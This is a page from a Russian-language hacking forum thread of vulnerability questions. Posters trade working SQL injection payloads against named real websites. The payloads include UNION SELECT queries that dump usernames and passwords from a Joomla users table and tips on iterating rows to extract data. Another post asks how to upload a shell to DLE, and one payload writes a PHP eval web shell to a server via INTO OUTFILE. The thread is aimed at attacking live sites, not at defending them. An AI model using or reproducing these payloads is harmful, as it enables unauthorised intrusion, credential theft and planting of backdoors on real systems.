Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 620 of 1207
  1. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    http://forum.ixbt.com/topic.cgi?id=69:97
     
    #12381 Strilo4ka, 17 Apr 2010
    1 person likes this.
  2. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    http://www.ticketing.ru/news.php?id=1022+order+by+100--

    в данном месте интересует только раскрутка инклуда(!) расскажите что да как. Если тут это возможно
     
    #12382 jecka3000, 17 Apr 2010
  3. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Причем тут тогда SQl inj?
    И вообще там просто нет подключаемого файла в директории.
    На запрос не как не повлияешь.
     
    #12383 SeNaP, 17 Apr 2010
    1 person likes this.
  4. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    какие есть способы заливки шелла в DLE ? подскажите, кто сталкивался, очень нужно :(
     
    #12384 daniel_1024, 17 Apr 2010
  5. [@p05]

    [@p05] Elder - Старейшина

    Joined:
    20 Apr 2007
    Messages:
    42
    Likes Received:
    15
    Reputations:
    1
    версия даты?
     
    #12385 [@p05], 17 Apr 2010
    1 person likes this.
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,518
    Likes Received:
    401
    Reputations:
    196

    там нет инклюда, просто файла нет необходимого.
     
    #12386 попугай, 18 Apr 2010
  7. vsid55

    vsid55 Member

    Joined:
    4 Jan 2010
    Messages:
    49
    Likes Received:
    7
    Reputations:
    2
    Подскажите, что надо прописать чтобы инфу вытягивать со второй строки, а не с первой.
    Например в этой sql:
    +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(username,0x3a,password,0x3a,gid,0x3a,id)Gabriel,26,+from+jos_users+limit+1,1--
    спасибо.
     
    #12387 vsid55, 18 Apr 2010
    1 person likes this.
  8. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,group_concat(username,0x3a,pa ssword,0x3a,gid,0x3a,id)Gabriel,26,+from+jos_users--
     
    #12388 Seravin, 18 Apr 2010
    1 person likes this.
  9. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    vsid55, лимитом и перебирай
    +limit+1,1--
    +limit+2,1--
    +limit+3,1--
    +limit+4,1--
    и так далее
     
    #12389 GOGA075, 18 Apr 2010
    1 person likes this.
  10. slayzer

    slayzer New Member

    Joined:
    30 Apr 2009
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    MSSQL
    script.php?id=14'%20and%201=1--

    Выдает Error : Conversion failed when converting the varchar value '14\' to data type int. (severity 16). Как бороться ?
     
    #12390 slayzer, 18 Apr 2010
  11. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    OMG
    дай линк в ПМ..
     
    #12391 Дирижабль, 18 Apr 2010
  12. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    стандартная скуль в mysql

    http://www.xxx.com/index.php?id=2956775+union+select+1,2,3,4,5,6,7,8,9,10/*

    выдает нормальную страницу юзера

    а вот попытки вывести принтабельные поля не проходят.

    все фишки типа:
    http://www.xxx.com/index.php?id=-2956775+union+select+1,2,3,4,5,6,7,8,9,10/*
    http://www.xxx.com/index.php?id=29567111175+union+select+1,2,3,4,5,6,7,8,9,10/*
    http://www.xxx.com/index.php?id=2956775+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10/*

    не дают результат, выводит только:
    The profile is not active!

    есть ли еще идеи как это обойти?

    админки нет, а blind'oм тянуть 2 ляма юзеров это самоубийство
     
    #12392 durito, 18 Apr 2010
    Last edited: 18 Apr 2010
  13. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    budden

    http://www.xxx.com/index.php?id=2956775+and+1=1+union+select+1,2,3,4,5,6,7,8,9,10/*

    выдает профиль юзера
    такой же как и тут

    http://www.xxx.com/index.php?id=2956775


    сайт серьезный, поэтому урл не публикую
     
    #12393 durito, 18 Apr 2010
  14. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    unhex(hex())
     
    #12394 Ctacok, 18 Apr 2010
  15. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    and+1=0+ попробуй
    -2956775 тоже
     
    #12395 wildshaman, 18 Apr 2010
  16. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    Что значит выдает профиль юзера?
    Если значение intval, то и так будет выдавать id=2956775+antichat+ru--+, и не факт что это инжа. И что значит "and 1=1"? Параметр id и так верный, какой смысл в данной манипуляции?

    И последнее.. Только я не вижу вопроса?
     
    #12396 v1d0qz, 18 Apr 2010
  17. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    какую профил ?

    http://www.xxx.com/profil.php?id=2956775
    ссилка у тебя такая ?
     
    #12397 LokbatanLi, 18 Apr 2010
  18. [ DSU ]

    [ DSU ] Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    103
    Likes Received:
    96
    Reputations:
    88
    только я не понимаю что он хочет?
    ссылку в студию посмотрим есть скуль или нету.
     
    #12398 [ DSU ], 18 Apr 2010
  19. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    вот ссылка

    http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80/*
     
    #12399 durito, 18 Apr 2010
  20. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Не могу залить shell

    http://www.bedag.ch/news/news_d.php?id=-64+union+select+1,2,3,4,5,6,7,8,9,10,11,'<?php eval($_GET[‘e’]) ?>',13,14,15,16,17,18,19,20,21,22,23,24,25,26+INTO+OUTFILE+'E:/webroot/a99/a99a-www-www/events/shell.php'+--+
     
    #12400 FlaktW, 18 Apr 2010
(You must log in or sign up to post here.)
Page 620 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.